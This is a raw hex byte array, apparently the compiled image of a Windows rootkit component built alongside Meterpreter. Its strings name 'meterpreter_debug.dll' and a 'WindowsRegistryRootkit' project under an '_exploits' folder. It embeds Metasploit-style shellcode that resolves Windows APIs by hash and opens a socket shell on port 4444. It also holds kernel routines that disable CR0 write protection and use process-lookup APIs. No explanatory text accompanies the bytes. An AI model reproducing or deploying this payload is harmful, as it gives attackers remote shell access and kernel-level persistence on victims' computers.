0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0xb5,0x04,0x6c,0x73,0x74,0x72,0x6c,0x65, 0x6e,0x41,0x00,0x00,0x8d,0x04,0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6c,0x65,0x00, 0x3b,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6e,0x64,0x6c,0x65,0x00,0x00, 0x3a,0x03,0x4f,0x75,0x74,0x70,0x75,0x74,0x44,0x65,0x62,0x75,0x67,0x53,0x74,0x72, 0x69,0x6e,0x67,0x41,0x00,0x00,0xfd,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x46,0x72,0x65, 0x65,0x00,0xf9,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00, 0x20,0x02,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73, 0x00,0x00,0xf1,0x02,0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x61,0x72,0x79,0x41, 0x00,0x00,0x4b,0x45,0x52,0x4e,0x45,0x4c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x07,0x03,0x77,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x41,0x00,0xf8,0x01,0x4d,0x65, 
0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x41,0x00,0x55,0x53,0x45,0x52,0x33,0x32, 0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5e,0x01,0x47,0x65,0x74,0x55,0x73,0x65,0x72,0x4e, 0x61,0x6d,0x65,0x41,0x00,0x00,0x41,0x44,0x56,0x41,0x50,0x49,0x33,0x32,0x2e,0x64, 0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x92,0x26,0x00,0x00, 0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x88,0x26,0x00,0x00, 0x8c,0x26,0x00,0x00,0x90,0x26,0x00,0x00,0x60,0x13,0x00,0x00,0xa8,0x26,0x00,0x00, 0x00,0x00,0x6d,0x65,0x74,0x65,0x72,0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65, 0x62,0x75,0x67,0x2e,0x64,0x6c,0x6c,0x00,0x44,0x75,0x6d,0x6d,0x79,0x00,0x00,0x00, 0x52,0x53,0x44,0x53,0x82,0x5a,0x19,0x91,0x44,0xdc,0xaa,0x48,0x8a,0xc8,0x7d,0xac, 0xf1,0xd6,0xba,0x09,0x01,0x00,0x00,0x00,0x58,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f, 0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c, 0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52, 0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x6d,0x65,0x74,0x65,0x72, 0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x70,0x64,0x62, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b, 0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0, 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57, 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01, 0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b, 0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4, 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24, 0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d, 0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07, 0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00, 0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff, 0xd5,0x97,0x31,0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57, 0x68,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,0xd5, 0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x97,0x68,0x75,0x6e,0x4d, 0x61,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5, 0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53, 0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff, 
0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0xc8,0x00,0x00,0x00,0x27,0x30,0x2e,0x30,0x34,0x30,0x3b,0x30, 0x4d,0x30,0x54,0x30,0x66,0x30,0x73,0x30,0x85,0x30,0x97,0x30,0x9e,0x30,0xba,0x30, 0xd5,0x30,0xdc,0x30,0xee,0x30,0x03,0x31,0x0d,0x31,0x2b,0x31,0x38,0x31,0x40,0x31, 0x46,0x31,0x4d,0x31,0x66,0x31,0x6e,0x31,0x74,0x31,0x7b,0x31,0x88,0x31,0x8f,0x31, 0x9e,0x31,0xa4,0x31,0xb6,0x31,0xbd,0x31,0xca,0x31,0xd1,0x31,0xef,0x31,0xf4,0x31, 0x7e,0x32,0x85,0x32,0x95,0x32,0xa0,0x32,0xae,0x32,0xb5,0x32,0xe3,0x32,0x00,0x33, 0x0a,0x33,0x17,0x33,0x2b,0x33,0x31,0x33,0x3b,0x33,0x63,0x33,0x68,0x33,0x70,0x33, 0x78,0x33,0x83,0x33,0xc4,0x33,0xca,0x33,0xcf,0x33,0xd7,0x33,0xec,0x33,0xf1,0x33, 0x05,0x34,0x0a,0x34,0x2a,0x34,0x56,0x34,0x86,0x34,0x8c,0x34,0x9b,0x34,0xa3,0x34, 0xc0,0x34,0xc9,0x34,0xd0,0x34,0xe2,0x34,0xe8,0x34,0xee,0x34,0xf4,0x34,0xfa,0x34, 
0x00,0x35,0x06,0x35,0x0c,0x35,0x12,0x35,0x18,0x35,0x1e,0x35,0x24,0x35,0x2a,0x35, 0x30,0x35,0x36,0x35,0x3c,0x35,0x42,0x35,0x48,0x35,0x4e,0x35,0x54,0x35,0x5a,0x35, 0x60,0x35,0x66,0x35,0x6c,0x35,0x72,0x35,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x55,0x8b,0xec,0x83,0xec,0x10,0x8b,0x45,0x08,0x50,0xe8,0xd1,0xe1,0xff,0xff,0xc7, 0x45,0xf8,0x00,0x16,0x00,0x00,0x8b,0x4d,0xf8,0x51,0x6a,0x00,0xff,0x15,0xe0,0x02, 
0x00,0x10,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x74,0x4a,0x68,0x00,0x16,0x00,0x00, 0x68,0x60,0x39,0x00,0x10,0x8b,0x55,0xfc,0x52,0xe8,0x80,0xdc,0xff,0xff,0x83,0xc4, 0x0c,0x8b,0x45,0x08,0x50,0x68,0x14,0x2e,0x00,0x10,0xe8,0x51,0xd6,0xff,0xff,0x89, 0x45,0xf0,0x8b,0x4d,0x08,0x51,0x68,0x10,0x2e,0x00,0x10,0xe8,0x40,0xd6,0xff,0xff, 0x89,0x45,0xf4,0x8b,0x55,0xf0,0x8b,0x45,0xf8,0x89,0x02,0x8b,0x4d,0xf4,0x8b,0x55, 0xfc,0x89,0x11,0xeb,0x0d,0x68,0xec,0x09,0x00,0x10,0xe8,0x03,0xdc,0xff,0xff,0x83, 0xc4,0x04,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x6a,0x01,0xff,0x15,0x00,0x03,0x00,0x10,0x0f,0x20,0xc0,0x25,0xff, 0xff,0xfe,0xff,0x0f,0x22,0xc0,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x0f,0x20,0xc0,0x0d,0x00,0x00,0x01,0x00,0x0f,0x22,0xc0,0x5d,0xc3, 0x55,0x8b,0xec,0x83,0xec,0x14,0xe8,0xc5,0xff,0xff,0xff,0x6a,0x06,0x68,0xf4,0x2d, 0x00,0x10,0xa1,0x0c,0x2e,0x00,0x10,0x50,0xe8,0xe1,0xdb,0xff,0xff,0x83,0xc4,0x0c, 0xe8,0xcb,0xff,0xff,0xff,0x8b,0x4d,0x0c,0x51,0x8b,0x55,0x08,0x52,0xff,0x15,0x0c, 0x2e,0x00,0x10,0x89,0x45,0xfc,0x8b,0x45,0xfc,0x50,0x68,0x04,0x0a,0x00,0x10,0xe8, 0x7e,0xdb,0xff,0xff,0x83,0xc4,0x08,0x68,0x00,0x54,0x00,0x10,0xff,0x15,0x04,0x03, 0x00,0x10,0x85,0xc0,0x75,0x07,0xc6,0x05,0xfa,0x2d,0x00,0x10,0x01,0x83,0x7d,0xfc, 0x00,0x0f,0x8c,0x1c,0x01,0x00,0x00,0x8b,0x0d,0xfc,0x2d,0x00,0x10,0x51,0x6a,0x00, 0xff,0x15,0xe0,0x02,0x00,0x10,0x89,0x45,0xf8,0x83,0x7d,0xf8,0x00,0x0f,0x84,0xf6, 0x00,0x00,0x00,0x8b,0x15,0xfc,0x2d,0x00,0x10,0x52,0xa1,0x1c,0x2e,0x00,0x10,0x50, 0x8b,0x4d,0xf8,0x51,0xe8,0x65,0xdb,0xff,0xff,0x83,0xc4,0x0c,0x8b,0x15,0x08,0x2e, 0x00,0x10,0x2b,0x15,0x00,0x2e,0x00,0x10,0x52,0x8b,0x45,0xf8,0x50,0xe8,0x4e,0xd8, 0xff,0xff,0xe8,0x19,0xff,0xff,0xff,0x8b,0x0d,0x04,0x2e,0x00,0x10,0x51,0x8b,0x55, 0xf8,0x03,0x15,0x00,0x2e,0x00,0x10,0x52,0xa1,0x08,0x2e,0x00,0x10,0x50,0xe8,0x2b, 0xdb,0xff,0xff,0x83,0xc4,0x0c,0xe8,0x15,0xff,0xff,0xff,0x8b,0x0d,0x08,0x2e,0x00, 
0x10,0x2b,0x0d,0x00,0x2e,0x00,0x10,0x89,0x4d,0xf0,0x8b,0x55,0xf0,0x52,0xe8,0x4d, 0xfe,0xff,0xff,0x8b,0x45,0xf0,0x50,0x68,0x90,0x25,0x00,0x10,0xe8,0xdf,0xd4,0xff, 0xff,0x89,0x45,0xf4,0x8b,0x4d,0xf4,0x51,0x68,0x34,0x0a,0x00,0x10,0xe8,0xb0,0xda, 0xff,0xff,0x83,0xc4,0x08,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0x0f,0xb6,0x15,0xfa, 0x2d,0x00,0x10,0xf7,0xda,0x1b,0xd2,0x23,0x15,0x1c,0x2e,0x00,0x10,0x52,0x8b,0x45, 0xf4,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xff,0xff,0x1f,0x00,0x8d,0x4d,0xec, 0x51,0xff,0x15,0xf4,0x02,0x00,0x10,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x7c,0x0c, 0x8b,0x55,0xec,0x52,0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x45,0xfc,0x50, 0x68,0x60,0x0a,0x00,0x10,0xe8,0x58,0xda,0xff,0xff,0x83,0xc4,0x08,0x6a,0x00,0x8b, 0x4d,0xf8,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0x55,0x08,0xc7,0x42,0x34,0x00, 0x00,0x00,0x00,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89, 0x4d,0xfc,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x28,0x89,0x45,0xf8,0x6a,0x06, 0x8b,0x4d,0xf8,0x51,0x68,0xf4,0x2d,0x00,0x10,0xe8,0x40,0xda,0xff,0xff,0x83,0xc4, 0x0c,0x8b,0x55,0xf8,0x89,0x15,0x0c,0x2e,0x00,0x10,0xe8,0x01,0xfe,0xff,0xff,0x8b, 0x45,0xf8,0xc6,0x00,0x68,0x8b,0x4d,0xf8,0xc7,0x41,0x01,0x20,0x50,0x00,0x10,0x8b, 0x55,0xf8,0xc6,0x42,0x05,0xc3,0xe8,0x05,0xfe,0xff,0xff,0x68,0x20,0x50,0x00,0x10, 0x8b,0x45,0xf8,0x50,0x68,0x88,0x0a,0x00,0x10,0xe8,0xc4,0xd9,0xff,0xff,0x83,0xc4, 0x0c,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x30,0x8b,0x45,0x0c,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b, 0x4d,0x10,0xc7,0x01,0x00,0x00,0x00,0x00,0x8b,0x55,0x08,0x8b,0x45,0x08,0x03,0x42, 0x3c,0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x0f,0xb7,0x51,0x14,0x8b,0x45,0xf8,0x8d,0x4c, 0x10,0x18,0x89,0x4d,0xf0,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0xc7,0x45,0xf4,0x00, 0x00,0x00,0x00,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xec,0x83, 
0xc2,0x01,0x89,0x55,0xec,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x06,0x39,0x4d,0xec,0x0f, 0x83,0xdc,0x00,0x00,0x00,0x8b,0x55,0xf0,0x8b,0x45,0x08,0x03,0x42,0x0c,0x89,0x45, 0xdc,0x8b,0x4d,0xf0,0x8b,0x51,0x24,0x81,0xe2,0x00,0x00,0x00,0x02,0x0f,0x84,0xb0, 0x00,0x00,0x00,0x68,0xc8,0x0a,0x00,0x10,0x8d,0x45,0xe0,0x50,0xe8,0x0f,0xe0,0xff, 0xff,0x85,0xc0,0x0f,0x84,0x9a,0x00,0x00,0x00,0x83,0x7d,0xfc,0x00,0x74,0x4f,0x8b, 0x4d,0xfc,0x03,0x4d,0xf4,0x8b,0x55,0xf0,0x39,0x4a,0x0c,0x75,0x41,0x8b,0x45,0xf8, 0x8b,0x48,0x38,0x83,0xe9,0x01,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x74,0x1c,0x8b,0x45, 0xf8,0x8b,0x48,0x38,0x83,0xe9,0x01,0xf7,0xd1,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x8b, 0x45,0xf8,0x03,0x48,0x38,0x89,0x4d,0xd4,0xeb,0x09,0x8b,0x4d,0xf0,0x8b,0x51,0x08, 0x89,0x55,0xd4,0x8b,0x45,0xf4,0x03,0x45,0xd4,0x89,0x45,0xf4,0xeb,0x45,0x8b,0x4d, 0xf0,0x8b,0x51,0x0c,0x89,0x55,0xfc,0x8b,0x45,0xf8,0x8b,0x48,0x38,0x83,0xe9,0x01, 0x8b,0x55,0xf0,0x23,0x4a,0x08,0x74,0x1c,0x8b,0x45,0xf8,0x8b,0x48,0x38,0x83,0xe9, 0x01,0xf7,0xd1,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x8b,0x45,0xf8,0x03,0x48,0x38,0x89, 0x4d,0xd0,0xeb,0x09,0x8b,0x4d,0xf0,0x8b,0x51,0x08,0x89,0x55,0xd0,0x8b,0x45,0xd0, 0x89,0x45,0xf4,0x8b,0x4d,0xf0,0x83,0xc1,0x28,0x89,0x4d,0xf0,0xe9,0x0b,0xff,0xff, 0xff,0x8b,0x55,0xf4,0x3b,0x15,0x04,0x2e,0x00,0x10,0x72,0x75,0x8b,0x45,0xfc,0x50, 0x8b,0x4d,0xf4,0x51,0x68,0xd0,0x0a,0x00,0x10,0xe8,0x54,0xd8,0xff,0xff,0x83,0xc4, 0x0c,0x8b,0x55,0x0c,0x8b,0x45,0xfc,0x89,0x02,0x8b,0x4d,0x10,0x8b,0x55,0xf4,0x89, 0x11,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xf8,0x8d,0x44,0x0a,0x18,0x89, 0x45,0xf0,0xc7,0x45,0xd8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,0xd8,0x83,0xc1, 0x01,0x89,0x4d,0xd8,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x06,0x39,0x45,0xd8,0x73,0x1d, 0x8b,0x4d,0xf0,0x8b,0x51,0x24,0x81,0xe2,0xff,0xff,0xff,0xfd,0x8b,0x45,0xf0,0x89, 0x50,0x24,0x8b,0x4d,0xf0,0x83,0xc1,0x28,0x89,0x4d,0xf0,0xeb,0xce,0xb0,0x01,0xeb, 0x02,0x32,0xc0,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 
0x55,0x8b,0xec,0x83,0xec,0x20,0x83,0x3d,0x08,0x2e,0x00,0x10,0x00,0x74,0x05,0xe9, 0xd7,0x00,0x00,0x00,0x83,0x7d,0x0c,0x00,0x0f,0x85,0xcd,0x00,0x00,0x00,0x8b,0x45, 0x10,0x8b,0x08,0xc1,0xe9,0x08,0x83,0xe1,0x01,0x0f,0x84,0xbc,0x00,0x00,0x00,0xc6, 0x45,0xff,0x00,0x8b,0x55,0x10,0x8b,0x42,0x04,0x89,0x45,0xf4,0x8b,0x4d,0x10,0x8b, 0x51,0x0c,0x89,0x55,0xf8,0x8b,0x45,0xf8,0x50,0x8b,0x4d,0xf4,0x51,0x8b,0x55,0x08, 0x52,0x68,0x90,0x0b,0x00,0x10,0xe8,0x87,0xd7,0xff,0xff,0x83,0xc4,0x10,0xc7,0x45, 0xf0,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xf0,0x83,0xc0,0x01,0x89,0x45,0xf0, 0x83,0x7d,0xf0,0x07,0x73,0x33,0x8b,0x4d,0xf0,0x8b,0x14,0x8d,0xa4,0x2d,0x00,0x10, 0x52,0x8d,0x45,0xe8,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x6a,0x01,0x8d,0x4d,0xe8, 0x51,0x8b,0x55,0x08,0x52,0xe8,0x86,0xdf,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0,0x74, 0x06,0xc6,0x45,0xff,0x01,0xeb,0x02,0xeb,0xbe,0x0f,0xb6,0x4d,0xff,0x85,0xc9,0x74, 0x3a,0xc7,0x45,0xe4,0x00,0x00,0x00,0x00,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0x8d, 0x55,0xe0,0x52,0x8d,0x45,0xe4,0x50,0x8b,0x4d,0xf4,0x51,0xe8,0x60,0xfd,0xff,0xff, 0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x14,0x8b,0x45,0xf4,0x03,0x45,0xe4,0xa3,0x08,0x2e, 0x00,0x10,0x8b,0x4d,0xf4,0x51,0xe8,0xc5,0xfc,0xff,0xff,0x8b,0xe5,0x5d,0xc2,0x0c, 0x00,0x00,0x00,0x00,0x40,0x55,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x1e,0x59,0x00,0x00,0x90,0x02,0x00,0x00,0x30,0x55,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x70,0x59,0x00,0x00,0x80,0x02,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x44,0x59,0x00,0x00,0x2c,0x59,0x00,0x00,0x5e,0x59,0x00,0x00,0x00,0x00,0x00,0x00, 0x1c,0x56,0x00,0x00,0x30,0x56,0x00,0x00,0x48,0x56,0x00,0x00,0x66,0x56,0x00,0x00, 0x82,0x56,0x00,0x00,0x9a,0x56,0x00,0x00,0xb0,0x56,0x00,0x00,0xba,0x56,0x00,0x00, 0xd4,0x56,0x00,0x00,0xe8,0x56,0x00,0x00,0xf2,0x56,0x00,0x00,0x0c,0x57,0x00,0x00, 0x26,0x57,0x00,0x00,0x3e,0x57,0x00,0x00,0x52,0x57,0x00,0x00,0x64,0x57,0x00,0x00, 
0x7c,0x57,0x00,0x00,0x0e,0x56,0x00,0x00,0xb0,0x57,0x00,0x00,0xc4,0x57,0x00,0x00, 0xd4,0x57,0x00,0x00,0xe6,0x57,0x00,0x00,0x06,0x58,0x00,0x00,0x1a,0x58,0x00,0x00, 0x24,0x58,0x00,0x00,0x2e,0x58,0x00,0x00,0x46,0x58,0x00,0x00,0x50,0x58,0x00,0x00, 0x5a,0x58,0x00,0x00,0x76,0x58,0x00,0x00,0x98,0x58,0x00,0x00,0xb6,0x58,0x00,0x00, 0xd2,0x58,0x00,0x00,0xea,0x58,0x00,0x00,0x0a,0x59,0x00,0x00,0x04,0x56,0x00,0x00, 0xec,0x55,0x00,0x00,0x98,0x57,0x00,0x00,0xe0,0x55,0x00,0x00,0x00,0x00,0x00,0x00, 0x3c,0x00,0x44,0x62,0x67,0x50,0x72,0x69,0x6e,0x74,0x00,0x00,0x5f,0x05,0x52,0x74, 0x6c,0x49,0x6e,0x69,0x74,0x55,0x6e,0x69,0x63,0x6f,0x64,0x65,0x53,0x74,0x72,0x69, 0x6e,0x67,0x00,0x00,0x80,0x07,0x6d,0x65,0x6d,0x73,0x65,0x74,0x00,0x00,0x2a,0x03, 0x4b,0x65,0x53,0x65,0x74,0x45,0x76,0x65,0x6e,0x74,0x00,0x00,0x85,0x00,0x45,0x78, 0x46,0x72,0x65,0x65,0x50,0x6f,0x6f,0x6c,0x57,0x69,0x74,0x68,0x54,0x61,0x67,0x00, 0x41,0x04,0x4f,0x62,0x66,0x44,0x65,0x72,0x65,0x66,0x65,0x72,0x65,0x6e,0x63,0x65, 0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0xa6,0x04,0x50,0x73,0x4c,0x6f,0x6f,0x6b, 0x75,0x70,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,0x63,0x65, 